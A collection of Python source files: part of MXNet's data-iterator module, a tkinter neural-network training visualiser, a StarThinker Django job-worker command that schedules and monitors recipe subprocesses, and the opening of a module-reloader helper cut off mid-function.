self.current_batch = [None for i in range(self.n_iter)]
self.next_batch = [None for i in range(self.n_iter)]
def prefetch_func(self, i):
"""Thread entry"""
while True:
self.data_taken[i].wait()
if not self.started:
break
try:
self.next_batch[i] = self.iters[i].next()
except StopIteration:
self.next_batch[i] = None
self.data_taken[i].clear()
self.data_ready[i].set()
self.prefetch_threads = [threading.Thread(target=prefetch_func, args=[self, i]) \
for i in range(self.n_iter)]
for thread in self.prefetch_threads:
thread.daemon = True
thread.start()
def __del__(self):
self.started = False
for e in self.data_taken:
e.set()
for thread in self.prefetch_threads:
thread.join()
@property
def provide_data(self):
"""The name and shape of data provided by this iterator"""
if self.rename_data is None:
return sum([i.provide_data for i in self.iters], [])
else:
return sum([[
DataDesc(r[x.name], x.shape, x.dtype)
if isinstance(x, DataDesc) else DataDesc(*x)
for x in i.provide_data
] for r, i in zip(self.rename_data, self.iters)], [])
@property
def provide_label(self):
"""The name and shape of label provided by this iterator"""
if self.rename_label is None:
return sum([i.provide_label for i in self.iters], [])
else:
return sum([[
DataDesc(r[x.name], x.shape, x.dtype)
if isinstance(x, DataDesc) else DataDesc(*x)
for x in i.provide_label
] for r, i in zip(self.rename_label, self.iters)], [])
def reset(self):
for e in self.data_ready:
e.wait()
for i in self.iters:
i.reset()
for e in self.data_ready:
e.clear()
for e in self.data_taken:
e.set()
def iter_next(self):
for e in self.data_ready:
e.wait()
if self.next_batch[0] is None:
for i in self.next_batch:
assert i is None, "Number of entry mismatches between iterators"
return False
else:
for batch in self.next_batch:
assert batch.pad == self.next_batch[0].pad, \
"Number of entry mismatches between iterators"
self.current_batch = DataBatch(sum([batch.data for batch in self.next_batch], []),
sum([batch.label for batch in self.next_batch], []),
self.next_batch[0].pad,
self.next_batch[0].index,
provide_data=self.provide_data,
provide_label=self.provide_label)
for e in self.data_ready:
e.clear()
for e in self.data_taken:
e.set()
return True
def next(self):
if self.iter_next():
return self.current_batch
else:
raise StopIteration
def getdata(self):
return self.current_batch.data
def getlabel(self):
return self.current_batch.label
def getindex(self):
return self.current_batch.index
def getpad(self):
return self.current_batch.pad
def _init_data(data, allow_empty, default_name):
"""Convert data into canonical form."""
assert (data is not None) or allow_empty
if data is None:
data = []
if isinstance(data, (np.ndarray, NDArray)):
data = [data]
if isinstance(data, list):
if not allow_empty:
assert(len(data) > 0)
if len(data) == 1:
data = OrderedDict([(default_name, data[0])])
else:
data = OrderedDict([('_%d_%s' % (i, default_name), d) for i, d in enumerate(data)])
if not isinstance(data, dict):
raise TypeError("Input must be NDArray, numpy.ndarray, " + \
"a list of them or dict with them as values")
for k, v in data.items():
if not isinstance(v, NDArray):
try:
data[k] = array(v)
except Exception:
raise TypeError(("Invalid type '%s' for %s, " % (type(v), k)) + \
"should be NDArray or numpy.ndarray")
return list(data.items())
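# Illustrative sketch of the canonical forms produced above, assuming numpy
# inputs. A single array is keyed by the default name; a list gets positional
# names; values are converted to NDArray.
#
#   _init_data(np.zeros((10, 2)), False, 'data')  # -> [('data', <NDArray 10x2>)]
#   _init_data([a, b], False, 'data')             # -> [('_0_data', ...), ('_1_data', ...)]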
class NDArrayIter(DataIter):
"""NDArrayIter object in mxnet. Taking NDArray or numpy array to get dataiter.
Parameters
----------
data: NDArray or numpy.ndarray, a list of them, or a dict of string to them.
NDArrayIter supports single or multiple data and label.
label: NDArray or numpy.ndarray, a list of them, or a dict of them.
Same as data, but is not fed to the model during testing.
batch_size: int
Batch Size
shuffle: bool
Whether to shuffle the data
last_batch_handle: 'pad', 'discard' or 'roll_over'
How to handle the last batch
Note
----
This iterator will pad, discard or roll over the last batch if
the size of data does not match batch_size. Roll over is intended
for training and can cause problems if used for prediction.
"""
def __init__(self, data, label=None, batch_size=1, shuffle=False,
last_batch_handle='pad', label_name='softmax_label'):
# pylint: disable=W0201
super(NDArrayIter, self).__init__()
self.data = _init_data(data, allow_empty=False, default_name='data')
self.label = _init_data(label, allow_empty=True, default_name=label_name)
# shuffle data
if shuffle:
idx = np.arange(self.data[0][1].shape[0])
np.random.shuffle(idx)
self.data = [(k, array(v.asnumpy()[idx], v.context)) for k, v in self.data]
self.label = [(k, array(v.asnumpy()[idx], v.context)) for k, v in self.label]
# batching
if last_batch_handle == 'discard':
new_n = self.data[0][1].shape[0] - self.data[0][1].shape[0] % batch_size
data_dict = OrderedDict(self.data)
label_dict = OrderedDict(self.label)
for k, _ in self.data:
data_dict[k] = data_dict[k][:new_n]
for k, _ in self.label:
label_dict[k] = label_dict[k][:new_n]
self.data = list(data_dict.items())
self.label = list(label_dict.items())
self.data_list = [x[1] for x in self.data] + [x[1] for x in self.label]
self.num_source = len(self.data_list)
self.num_data = self.data_list[0].shape[0]
assert self.num_data >= batch_size, \
"batch_size need to be smaller than data size."
self.cursor = -batch_size
self.batch_size = batch_size
self.last_batch_handle = last_batch_handle
@property
def provide_data(self):
"""The name and shape of data provided by this iterator"""
return [
DataDesc(k, tuple([self.batch_size] + list(v.shape[1:])), v.dtype)
for k, v in self.data
]
@property
def provide_label(self):
"""The name and shape of label provided by this iterator"""
return [
DataDesc(k, tuple([self.batch_size] + list(v.shape[1:])), v.dtype)
for k, v in self.label
]
def hard_reset(self):
"""Igore roll over data and set to start"""
self.cursor = -self.batch_size
def reset(self):
if self.last_batch_handle == 'roll_over' and self.cursor > self.num_data:
self.cursor = -self.batch_size + (self.cursor%self.num_data)%self.batch_size
else:
self.cursor = -self.batch_size
def iter_next(self):
self.cursor += self.batch_size
return self.cursor < self.num_data
def next(self):
if self.iter_next():
return DataBatch(data=self.getdata(), label=self.getlabel(), \
pad=self.getpad(), index=None)
else:
raise StopIteration
def _getdata(self, data_source):
"""Load data from underlying arrays, internal use only"""
assert(self.cursor < self.num_data), "DataIter needs reset."
if self.cursor + self.batch_size <= self.num_data:
return [x[1][self.cursor:self.cursor+self.batch_size] for x in data_source]
else:
pad = self.batch_size - self.num_data + self.cursor
return [concatenate([x[1][self.cursor:], x[1][:pad]]) for x in data_source]
def getdata(self):
return self._getdata(self.data)
def getlabel(self):
return self._getdata(self.label)
def getpad(self):
if self.last_batch_handle == 'pad' and \
self.cursor + self.batch_size > self.num_data:
return self.cursor + self.batch_size - self.num_data
else:
return 0
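# Illustrative sketch: with 25 samples and batch_size=10, last_batch_handle='pad'
# wraps the final batch around to the first 5 samples and reports getpad() == 5
# so downstream code can drop the duplicated examples.
#
#   it = NDArrayIter(np.arange(50).reshape(25, 2), batch_size=10,
#                    last_batch_handle='pad')
#   pads = [it.getpad() for _ in it]    # -> [0, 0, 5]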
class MXDataIter(DataIter):
"""DataIter built in MXNet. List all the needed functions here.
Parameters
----------
handle : DataIterHandle
the handle to the underlying C++ Data Iterator
"""
def __init__(self, handle, data_name='data', label_name='softmax_label', **_):
super(MXDataIter, self).__init__()
self.handle = handle
# debug option, used to test the speed with io effect eliminated
self._debug_skip_load = False
self._debug_at_begin = True
# load the first batch to get shape information
self.first_batch = None
self.first_batch = self.next()
data = self.first_batch.data[0]
label = self.first_batch.label[0]
# properties
self.provide_data = [DataDesc(data_name, data.shape, data.dtype)]
self.provide_label = [DataDesc(label_name, label.shape, label.dtype)]
self.batch_size = data.shape[0]
def __del__(self):
check_call(_LIB.MXDataIterFree(self.handle))
def debug_skip_load(self):
"""Set the iterator to simply return always first batch.
Notes
-----
This can be used to test the speed of network without taking
the loading delay into account.
"""
self._debug_skip_load = True
logging.info('Set debug_skip_load to be true, will simply return first batch')
def reset(self):
self._debug_at_begin = True
self.first_batch = None
check_call(_LIB.MXDataIterBeforeFirst(self.handle))
def next(self):
if self._debug_skip_load and not self._debug_at_begin:
return DataBatch(data=[self.getdata()], label=[self.getlabel()], pad=self.getpad(),
index=self.getindex())
if self.first_batch is not None:
batch = self.first_batch
self.first_batch = None
return batch
self._debug_at_begin = False
next_res = ctypes.c_int(0)
check_call(_LIB.MXDataIterNext(self.handle, ctypes.byref(next_res)))
if next_res.value:
return DataBatch(data=[self.getdata()], label=[self.getlabel()], pad=self.getpad(),
index=self.getindex())
else:
raise StopIteration
def iter_next(self):
if self.first_batch is not None:
return True
next_res = ctypes.c_int(0)
check_call(_LIB.MXDataIterNext(self.handle, ctypes.byref(next_res)))
return next_res.value
def getdata(self):
hdl = NDArrayHandle()
check_call(_LIB.MXDataIterGetData(self.handle, ctypes.byref(hdl)))
return NDArray(hdl, False)
def getlabel(self):
hdl = NDArrayHandle()
check_call(_LIB.MXDataIterGetLabel(self.handle, ctypes.byref(hdl)))
return NDArray(hdl, False)
def getindex(self):
index_size = ctypes.c_uint64(0)
index_data = ctypes.POINTER(ctypes.c_uint64)()
check_call(_LIB.MXDataIterGetIndex(self.handle,
ctypes.byref(index_data),
ctypes.byref(index_size)))
address = ctypes.addressof(index_data.contents)
dbuffer = (ctypes.c_uint64* index_size.value).from_address(address)
np_index = np.frombuffer(dbuffer, dtype=np.uint64)
return np_index.copy()
def getpad(self):
pad = ctypes.c_int(0)
check_call(_LIB.MXDataIterGetPadNum(self.handle, ctypes.byref(pad)))
return pad.value
def _make_io_iterator(handle):
"""Create an io iterator by handle."""
name = ctypes.c_char_p()
desc = ctypes.c_char_p()
num_args = mx_uint()
arg_names = ctypes.POINTER(ctypes.c_char_p)()
arg_types = ctypes.POINTER(ctypes.c_char_p)()
arg_descs = ctypes.POINTER(ctypes.c_char_p)()
check_call(_LIB.MXDataIterGetIterInfo( \
handle, ctypes.byref(name), ctypes.byref(desc), \
ctypes.byref(num_args), \
ctypes.byref(arg_names), \
ctypes.byref(arg_types), \
ctypes.byref(arg_descs)))
iter_name = py_str(name.value)
narg = int(num_args.value)
param_str = _build_param_doc(
[py_str(arg_names[i]) for i in range(narg)],
[py_str(arg_types[i]) for i in range(narg)],
[py_str(arg_descs[i]) for i in range(narg)])
doc_str = ('%s\n\n' +
'%s\n' +
'name : string, required.\n' +
' Name of the resulting data iterator.\n\n' +
'Returns\n' +
'-------\n' +
'iterator: DataIter\n'+
' The result iterator.')
doc_str = doc_str % (desc.value, param_str)
def creator(*args, **kwargs):
"""Create an iterator.
The parameters listed below can be passed in as keyword arguments.
Parameters
----------
name : string, required.
Name of the resulting data iterator.
Returns
-------
dataiter : DataIter
the resulting data iterator
"""
param_keys = []
param_vals = []
for k, val in kwargs.items():
param_keys.append(c_str(k))
param_vals.append(c_str(str(val)))
# create atomic symbol
param_keys = c_array(ctypes.c_char_p, param_keys)
param_vals = c_array(ctypes.c_char_p, param_vals)
iter_handle = DataIterHandle()
check_call(_LIB.MXDataIterCreateIter(
handle,
mx_uint(len(param_keys)),
param_keys, param_vals,
ctypes.byref(iter_handle)))
if len(args):
raise TypeError('%s can only accept keyword arguments' % iter_name)
return MXDataIter(iter_handle, **kwargs)
creator.__name__ = iter_name
creator.__doc__ = doc_str
return creator
def _init_io_module():
"""List and add all the data iterators to current module."""
plist = ctypes.POINTER(ctypes.c_void_p)()
size = ctypes.c_uint()
check_call(_LIB.MXListDataIters(ctypes.byref(size), ctypes.byref(plist)))
module_obj = sys.modules[__name__]
for i in range(size.value):
hdl = ctypes.c_void_p(plist[i])
dataiter = _make_io_iterator(hdl)
setattr(module_obj, dataiter.__name__, dataiter)
# Initialize the io in startups
_init_io_module()
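# Illustrative sketch: after _init_io_module() runs, one creator per registered
# C++ iterator is attached to this module, each accepting keyword arguments
# only. ImageRecordIter and its parameters below are hypothetical and depend on
# what the backend registers.
#
#   train = ImageRecordIter(path_imgrec='train.rec', batch_size=32,
#                           data_shape=(3, 224, 224))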
|
App.py
|
import tkinter as tk
import numpy as np
import tkinter.filedialog
import threading
import MLPV3
class App():
def __init__(self):
self.args = []
self.running = False
# Create the root window.
self.root = tk.Tk()
self.root.title("Neural Net Visualization")
self.root.geometry("%dx%d+0+0" % (self.root.winfo_screenwidth(), self.root.winfo_screenheight()))
# Create the frame for the canvas.
netFrame = tk.Frame(self.root, highlightbackground = "black", highlightcolor = "black", highlightthickness=1)
netFrame.pack(side = tk.RIGHT, fill = tk.BOTH, expand = 1)
# Create the canvas for the net representation.
self.canvas = tk.Canvas(netFrame)
self.canvas.configure(background='pink')
self.canvas.pack(fill = tk.BOTH, expand = 1)
# Create the frame for the settings.
settingsFrame = tk.Frame(self.root)
settingsFrame.pack(side = tk.LEFT, fill = tk.Y)
# Create a slider to select learning rate.
self.lrSlider = tk.Scale(settingsFrame, label = "Learning Rate", from_ = 0.001, to = 1, orient = tk.HORIZONTAL, resolution = 0.001, command = self.setLearningRate)
self.lrSlider.grid(row = 0, column = 0, sticky = tk.W)
# Create an entry box for custom learning rate.
self.lrInput = tk.Entry(settingsFrame)
self.lrInput.grid(row = 1, column = 0, sticky = tk.W, pady = 10)
# Create a slider to select number of epochs.
self.epochSlider = tk.Scale(settingsFrame, label = "Training Epochs", from_ = 1000, to = 1000000, orient = tk.HORIZONTAL, length = 200, resolution = 1000, command = self.setEpochs)
self.epochSlider.grid(row = 2, column = 0, sticky = tk.W)
# Create an entry box for a custom epoch count.
self.epochInput = tk.Entry(settingsFrame)
self.epochInput.grid(row = 3, column = 0, sticky = tk.W, pady = 10)
# Create a slider to select the error to stop at.
self.errorSlider = tk.Scale(settingsFrame, label = "Desired Error", from_ = 0, to = .3, orient = tk.HORIZONTAL, length = 200, resolution = 0.01, command = self.setError)
self.errorSlider.grid(row = 4, column = 0, sticky = tk.W)
# Create an entry box for a custom error.
self.errorInput = tk.Entry(settingsFrame)
self.errorInput.grid(row = 5, column = 0, sticky = tk.W, pady = 10)
# Create a dropdown menu to select activation function.
self.activationFunction = tk.StringVar(self.root)
self.activationFunction.set("Tanh")
self.activationMenu = tk.OptionMenu(settingsFrame, self.activationFunction, "Tanh", "Sigmoid", "ReLU", "LReLU")
self.activationMenu.grid(row = 6, column = 0, sticky = tk.W)
# Create a dropdown menu to select training type.
self.learningType = tk.StringVar(self.root)
self.learningType.set("Batch")
self.trainingMenu = tk.OptionMenu(settingsFrame, self.learningType, "Batch", "Stochastic", "Mini Batches")
self.trainingMenu.grid(row = 7, column = 0, sticky = tk.W)
self.batchSlider = tk.Scale(settingsFrame, label = "Mini Batch Size", from_ = 10, to = 1000, orient = tk.HORIZONTAL, length = 200, resolution = 10, command = self.setBatch)
self.batchSlider.grid(row = 8, column = 0, sticky = tk.W)
self.batchInput = tk.Entry(settingsFrame)
self.batchInput.grid(row = 9, column = 0, sticky = tk.W)
# Create a table and entry to input neural net shape
tk.Label(settingsFrame, text = "Neural Net Shape").grid(row = 10, column = 0, sticky = tk.W)
self.shapeInput = tk.Entry(settingsFrame)
self.shapeInput.grid(row = 11, column = 0, sticky = tk.W)
# Create a button that allows you to select a file for training data.
self.selectFileBtn = tk.Button(settingsFrame, text = "Select Training Data", command = self.selectTrainingData)
self.selectFileBtn.grid(row = 12, column = 0, sticky = tk.W, pady = 10)
self.dataFile = tk.StringVar(self.root)
self.dataFile.set("No Data File Selected");
self.selectedData = tk.Label(settingsFrame, textvariable = self.dataFile, wraplength = 200, anchor = tk.W, justify = tk.LEFT)
self.selectedData.grid(row = 13, column = 0, sticky = tk.W)
# Create a button to initialize network
self.initBtn = tk.Button(settingsFrame, text = "Initialize", command = self.initNet)
self.initBtn.grid(row = 14, column = 0, sticky = tk.W)
# Create a button to edit the neural net parameters
self.editBtn = tk.Button(settingsFrame, text = "Re-initialize Parameters", command = self.editNet)
self.editBtn.grid(row = 15, column = 0, sticky = tk.W)
# Create a button to start network training.
self.runBtn = tk.Button(settingsFrame, text = "Train", command = self.startNet)
self.runBtn.grid(row = 16, column = 0, sticky = tk.W)
# Create a button to stop network training.
self.stopBtn = tk.Button(settingsFrame, text = "Stop", command = self.stopNet)
self.stopBtn.grid(row = 17, column = 0, sticky = tk.W)
self.graphBtn = tk.Button(settingsFrame, text = "Generate Graph", command = self.generateGraph)
self.graphBtn.grid(row = 18, column = 0, sticky = tk.W)
# Create a label telling the status of the net.
self.status = tk.StringVar(self.root)
self.status.set("Running: " + str(self.running));
self.currentStatus = tk.Label(settingsFrame, textvariable = self.status, wraplength = 200, anchor = tk.W, justify = tk.LEFT)
self.currentStatus.grid(row = 19, column = 0, sticky = tk.W)
self.infoText = []
self.net = MLPV3.Net()
def setLearningRate(self, lr):
self.lrInput.delete(0, tk.END)
self.lrInput.insert(0, lr)
def setEpochs(self, epochs):
self.epochInput.delete(0, tk.END)
self.epochInput.insert(0, epochs)
def setError(self, error):
self.errorInput.delete(0, tk.END)
self.errorInput.insert(0, error)
def setBatch(self, batchSize):
self.batchInput.delete(0, tk.END)
self.batchInput.insert(0, batchSize)
def generateGraph(self):
self.net.generateGraph(self.trainingData)
def selectTrainingData(self):
self.trainingData = tkinter.filedialog.askopenfilename(initialdir = "/", title = "Select a file", filetypes = (("text files", "*.txt"),))
self.dataFile.set(self.trainingData)
def setInputs(self):
self.lr = self.lrInput.get()
self.epochs = self.epochInput.get()
self.error = self.errorInput.get()
self.shape = self.shapeInput.get()
self.batchSize = self.batchInput.get()
def startNet(self):
self.net.setInit(True)
self.net.startNet()
t1 = threading.Thread(target = self.net.train)
t1.daemon = True
t1.start()
self.running = True
def stopNet(self):
self.running = False
self.net.stopNet()
def initNet(self):
self.setInputs()
if any(c.isalpha() for c in self.lr) or any(c.isalpha() for c in self.epochs) or any(c.isalpha() for c in self.error) or any(c.isalpha() for c in self.shape):
print("Should not cointain alpha characters.")
else :
self.net.initNeuralNet(self.lr, self.epochs, self.error, self.activationFunction.get(), self.learningType.get(), self.trainingData, self.shape, self.batchSize)
self.drawNet()
def editNet(self):
self.lr = self.lrInput.get()
self.epochs = self.epochInput.get()
self.error = self.errorInput.get()
self.net.editNet(self.lr, self.epochs, self.error)
def drawNet(self):
self.canvas.delete("all");
shape = self.net.getShape()
layerDist = float(self.canvas.winfo_width()) / float(len(shape) + 1)
layers = []
nodeSize = 1
weightSize = 1
for layer in range(len(shape)):
prevNodes = []
layerPos = (layer + 1) * layerDist
nodeDist = float(self.canvas.winfo_height() - 40) / float((shape[layer] + 1))
nodes = []
for node in range(shape[layer]):
nodePos = ((node + 1) * nodeDist) + 20
nodes.append(nodePos)
self.canvas.create_oval(layerPos - nodeSize, nodePos - nodeSize, layerPos + nodeSize, nodePos + nodeSize, fill="black")
if layer > 0:
for prevNode in range(shape[layer - 1]):
line = self.canvas.create_line(layer * layerDist, layers[layer - 1][prevNode], layerPos, nodePos, fill = "blue", width = weightSize)
self.canvas.tag_lower(line)
layers.append(nodes)
self.drawInfo()
def drawInfo(self):
for index in range(0, len(self.infoText)):
self.canvas.delete(self.infoText[index])
self.infoText = []
self.infoText.append(self.canvas.create_text(self.canvas.winfo_width() - 80, 50, fill = "black", text = "Loss: \n" + str(self.net.getLoss())[0:7]))
self.infoText.append(self.canvas.create_text(self.canvas.winfo_width() - 80, 80, fill = "black", text = "Error: \n" + str(self.net.getError())[0:7]))
self.infoText.append(self.canvas.create_text(50, 50, fill = "black", text = "Epochs: \n" + str(self.net.getEpochs())))
def update(self):
if not self.net.isRunning():
self.running = False
self.status.set("Running: " + str(self.running));
if self.net.isRunning():
self.drawInfo()
def run(self):
while True:
self.update()
self.root.update_idletasks()
self.root.update()
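# Note: run() drives tkinter with a manual update()/update_idletasks() loop
# instead of root.mainloop(), so drawInfo() can repaint on every pass while the
# training thread runs in the background. An equivalent approach would be
# scheduling self.update with root.after(16, ...) and calling root.mainloop().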
app = App()
app.run()
|
job_worker.py
|
###########################################################################
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
import os
import fcntl
import json
import math
import uuid
import time
import signal
import traceback
import subprocess
import threading
from datetime import datetime
from django.core.management.base import BaseCommand, CommandError
from django.db import connection, transaction
from django.conf import settings
from starthinker_ui.recipe.models import Recipe, utc_milliseconds, utc_milliseconds_to_timezone, JOB_LOOKBACK_MS, JOB_INTERVAL_MS
from starthinker_ui.recipe.log import log_manager_start, log_manager_end, log_manager_scale, log_manager_timeout, log_manager_error
from starthinker_ui.recipe.log import log_job_timeout, log_job_error, log_job_start, log_job_end, log_job_cancel
from starthinker_ui.recipe.log import log_verbose, get_instance_name
from starthinker_ui.recipe.compute import group_instances_delete
MANAGER_ON = True
MANAGER_HEALTHY = True
IDLE_INTERVAL = 5 * 60 # if worker is idle for 5 minutes, shut it down
def signal_exit(signum, frame):
global MANAGER_ON
MANAGER_ON = False
signal.signal(signal.SIGINT, signal_exit)
signal.signal(signal.SIGTERM, signal_exit)
def worker_ping(worker_uid, recipe_uids):
# update recipes that belong to this worker
if recipe_uids:
Recipe.objects.filter(worker_uid=worker_uid, id__in=recipe_uids).update(worker_utm=utc_milliseconds())
def worker_status(worker_uid, recipe_uid, script, instance, hour, event, stdout, stderr):
try:
job = Recipe.objects.get(worker_uid=worker_uid, id=recipe_uid)
job.set_task(script, instance, hour, event, stdout, stderr)
except Recipe.DoesNotExist:
print('Expired Worker Job:', worker_uid, recipe_uid, script, instance, hour, event)
def worker_pull(worker_uid, jobs=1):
'''Atomic reservation of worker in jobs.
Args:
- worker_uid ( string ) - identifies a unique worker, must be same for every call from same worker.
- jobs ( integer ) - number of jobs to pull
'''
jobs_all = []
jobs_new = []
worker_utm = utc_milliseconds()
worker_lookback = worker_utm - JOB_LOOKBACK_MS
if jobs:
with transaction.atomic():
# find recipes that are available but have not been pinged recently from all workers ( pulls from pool )
where = Recipe.objects.filter(
active=True,
worker_utm__lte=worker_lookback,
job_utm__lte=worker_utm,
).exclude(job_utm=0).select_for_update(skip_locked=True).order_by('worker_utm').values_list('id', flat=True)[:jobs]
# mark those recipes as belonging to this worker
Recipe.objects.filter(id__in=where).update(worker_uid=worker_uid, worker_utm=worker_utm)
# find all recipes that belong to this worker and check if they have new tasks
for job in Recipe.objects.filter(active=True, worker_uid=worker_uid):
jobs_all.append(job.id)
task = job.get_task() # also resets status
if job.worker_utm == worker_utm and task: # jobs with current timestamp are new ( odds of a ping matching this worker_utm? ), isolate evens and odds?
jobs_new.append(task)
return jobs_all, jobs_new
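# Illustrative sketch of the reservation cycle a worker runs (names taken from
# this module): pull atomically, then keep pinging so other workers skip these
# recipes until JOB_LOOKBACK_MS elapses without a ping.
#
#   uid = get_instance_name()
#   jobs_all, jobs_new = worker_pull(uid, jobs=4)
#   worker_ping(uid, jobs_all)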
def worker_downscale():
name = get_instance_name()
if name != 'UNKNOWN':
group_instances_delete(name)
def make_non_blocking(file_io):
fd = file_io.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
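# Illustrative sketch: once a pipe is non-blocking, read() returns whatever is
# buffered (possibly None) instead of stalling the polling loop in Workers.poll.
#
#   proc = subprocess.Popen(['some_cmd'], stdout=subprocess.PIPE)  # hypothetical command
#   make_non_blocking(proc.stdout)
#   chunk = proc.stdout.read()    # returns immediately, may be None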
class Workers():
def __init__(self, uid, jobs_maximum, timeout_seconds, trace=False):
self.uid = uid or get_instance_name()
self.timeout_seconds = timeout_seconds
self.trace = trace
self.jobs_maximum = jobs_maximum
self.jobs = []
self.lock_thread = threading.Lock()
self.ping_event = threading.Event()
self.ping_thread = threading.Thread(target=self.ping)
self.ping_thread.start()
self.busy_time = datetime.utcnow()
def available(self):
return self.jobs_maximum - len(self.jobs)
def pull(self):
self.lock_thread.acquire()
# get jobs for this worker while holding the lock, so the ping thread sees a consistent job list
jobs_all, jobs_new = worker_pull(self.uid, jobs=self.available())
# remove all lost jobs from ping
jobs_remove = []
last_job = len(self.jobs)
while last_job > 0:
last_job -= 1
if self.jobs[last_job]['recipe']['setup']['uuid'] not in jobs_all:
jobs_remove.append(self.jobs[last_job])
del self.jobs[last_job]
# add all new jobs to ping
self.jobs.extend(jobs_new)
# allow pings to resume with up to date list
self.lock_thread.release()
# shut down all removed jobs
try:
for job in jobs_remove:
if job.get('job', {}).get('process'): job['job']['process'].kill()
self.cleanup(job)
log_job_cancel(job)
except Exception as e:
log_manager_error(traceback.format_exc())
def run(self, job, force=False):
job['recipe']['setup'].setdefault('timeout_seconds', self.timeout_seconds)
job['job'] = {
'worker':self.uid,
'id':str(uuid.uuid1()),
'process':None,
'utc':datetime.utcnow(),
}
filename = '%s/%s.json' % (settings.UI_CRON, job['job']['id'])
with open(filename, 'w') as job_file:
job_file.write(json.dumps(job['recipe'], default=str))
command = [
'%s/starthinker_virtualenv/bin/python' % settings.UI_ROOT,
'-u', '-W', 'ignore',
'%s/starthinker/task/%s/run.py' % (settings.UI_ROOT, job['script']),
filename,
'-i', str(job['instance']),
'--verbose',
]
if self.trace: command.append('--trace_file')
job['job']['process'] = subprocess.Popen(command, shell=False, cwd=settings.UI_ROOT, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
make_non_blocking(job['job']['process'].stdout)
make_non_blocking(job['job']['process'].stderr)
def cleanup(self, job):
filename = '%s/%s.json' % (settings.UI_CRON, job['job']['id'])
if os.path.exists(filename):
os.remove(filename)
def ping(self):
global MANAGER_HEALTHY
while MANAGER_HEALTHY and not self.ping_event.wait(JOB_INTERVAL_MS / 1000):
self.lock_thread.acquire()
try:
worker_ping(self.uid, [job['recipe']['setup']['uuid'] for job in self.jobs])
except Exception as e:
log_manager_error(traceback.format_exc())
MANAGER_HEALTHY = False
self.lock_thread.release()
def poll(self):
for job in self.jobs:
# if job changes state, this is set, then sent to database
status = None
# start job if it is not already running
if 'job' not in job:
self.run(job)
log_job_start(job)
status = 'JOB_START'
stdout = None
stderr = None
# if already running check status
else:
# read any incremental data from the process ( made non-blocking at construction )
stdout = job['job']['process'].stdout.read()
if stdout is not None: stdout = stdout.decode()
stderr = job['job']['process'].stderr.read()
if stderr is not None: stderr = stderr.decode()
# if process still running, check timeout or ping keep alive
poll = job['job']['process'].poll()
if poll is None:
# check if task is a timeout
if (datetime.utcnow() - job['job']['utc']).total_seconds() > job['recipe']['setup']['timeout_seconds']:
status = 'JOB_TIMEOUT'
job['job']['process'].kill()
self.cleanup(job)
log_job_timeout(job)
job['job']['process'] = None
# otherwise task is running, update stdout and stderr if present
elif stdout or stderr:
status = 'JOB_START'
# if process has return code, check if task is complete or error
else:
self.cleanup(job)
# if error scrap whole worker and flag error
if poll != 0:
status = 'JOB_ERROR'
log_job_error(job)
job['job']['process'] = None
# if success, pop task off the stack and flag success
else:
status = 'JOB_END'
log_job_end(job)
job['job']['process'] = None
# if status is set, send it to the database
if status:
worker_status(
job['job']['worker'],
job['recipe']['setup']['uuid'],
job['script'],
job['instance'],
job['hour'],
status,
stdout,
stderr
)
# remove all workers without a process, they are done
if self.jobs:
self.lock_thread.acquire()
self.jobs = [job for job in self.jobs if job['job']['process'] is not None]
self.lock_thread.release()
# update the busy time if jobs exist
if len(self.jobs) != 0: self.busy_time = datetime.utcnow()
# if workers remain, return True
return bool(self.jobs)
def idle(self):
return (datetime.utcnow() - self.busy_time).total_seconds() > IDLE_INTERVAL
def shutdown(self):
# wait for jobs to finish
while self.poll():
time.sleep(JOB_INTERVAL_MS / 1000)
# turn off threads ( ping )
self.ping_event.set()
class Command(BaseCommand):
help = 'Executes a recipe job and writes status to the database.'
def add_arguments(self, parser):
parser.add_argument(
'--worker',
action='store',
dest='worker',
default='',
help='Name of worker to use when requesting jobs.',
)
parser.add_argument(
'--jobs',
action='store',
dest='jobs',
default=3,
type=int,
help='Maximum number of simultaneous job processes to start within this worker.',
)
parser.add_argument(
'--timeout',
action='store',
dest='timeout',
default=60 * 60 * 12, # 12 hours
type=int,
help='Default seconds to allow a task to run before timing it out, also controlled by recipe.',
)
parser.add_argument(
'--verbose',
action='store_true',
dest='verbose',
default=False,
help='Causes log messages to also print.',
)
parser.add_argument(
'--trace',
action='store_true',
dest='trace',
default=False,
help='Create an execution trace in /tmp/starthinker_trace.log.',
)
parser.add_argument(
'--test',
action='store_true',
dest='test',
default=False,
help='Set test mode to execute loop only once and return workers.',
)
def handle(self, *args, **kwargs):
global MANAGER_ON
global MANAGER_HEALTHY
MANAGER_ON = True
MANAGER_HEALTHY = True
if kwargs['test']: print('Starting Up...')
if kwargs['verbose']: log_verbose()
log_manager_start()
if kwargs['test']: print('Initializing Workers...')
workers = Workers(
kwargs['worker'],
kwargs['jobs'],
kwargs['timeout'],
kwargs['trace'],
)
try:
while MANAGER_HEALTHY and MANAGER_ON:
# load jobs
workers.pull()
time.sleep(JOB_INTERVAL_MS / 1000)
# evaluate jobs
workers.poll()
# check if worker needs to scale down
if workers.idle():
MANAGER_ON = False
log_manager_timeout()
else:
time.sleep(JOB_INTERVAL_MS / 1000)
if kwargs['test']:
MANAGER_ON = False
except KeyboardInterrupt:
MANAGER_ON = False
except Exception as e:
if kwargs['test']: print(str(e))
log_manager_error(traceback.format_exc())
if MANAGER_HEALTHY:
if kwargs['test']: print('Shutting Down...')
workers.shutdown()
log_manager_end()
# worker will terminate itself in a group safe way
worker_downscale()
|
reloader_helpers.py
|
import os
import sys
import signal
import subprocess
from time import sleep
from multiprocessing import Process
def _iter_module_files():
"""This iterates over all relevant Python files.
It goes through all
loaded files from modules, all files in folders of already loaded modules
as well as all files reachable through a package.
"""
# The list call is necessary on Python 3 in case the module
# dictionary modifies during iteration.
for module in list(sys.modules.values()):
if module is None:
continue
filename = getattr(module, '__file__', None)
if filename:
old = None
while not os.path.isfile(filename):
old = filename
filename = os.path.dirname(filename)
if filename == old:
break
else:
if filename[-4:] in ('.pyc', '.pyo'):
filename = filename[:-1]
yield filename
def _get_args_for_reloading():
"""Returns the executable."""
